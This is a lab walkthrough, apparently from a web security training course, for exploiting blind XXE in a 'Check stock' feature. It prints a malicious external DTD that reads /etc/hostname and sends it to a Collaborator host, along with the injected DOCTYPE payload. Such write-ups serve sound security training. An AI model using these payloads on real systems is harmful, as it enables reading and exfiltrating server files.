Exploiting blind XXE to exfiltrate data using a malicious external DTD
Description
This lab has a “Check stock” feature that parses XML input but does not display the result.
Reproduction and proof of concept
Using Burp Suite Professional, go to the Burp menu, and launch the Burp Collaborator client.
Click “Copy to clipboard” to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Place the Burp Collaborator payload into a malicious DTD file:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/?x=%file;'>">
%eval;
%exfil;
Click “Go to exploit server” and save the malicious DTD file on your server. Click View exploit and take a note of the URL.
Exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click Check stock, and intercept the resulting POST request in Burp Suite.
Send to Repeater and insert the following external entity definition in between the XML declaration and the
stockCheck
element:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
Go back to the Burp Collaborator client window, and click “Poll now”. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the
/etc/hostname
file.
If you don’t see any interactions listed, wait a few seconds and try again.
Exploitability
An attacker needs to exfiltrate the contents of the /etc/hostname
file. A malicious DTD must be crafted and hosted on the exploit server and the check stock request must be tampered by adding a XML parameter entity. Note: To prevent the Academy platform being used to attack third parties, the firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator’s default public server.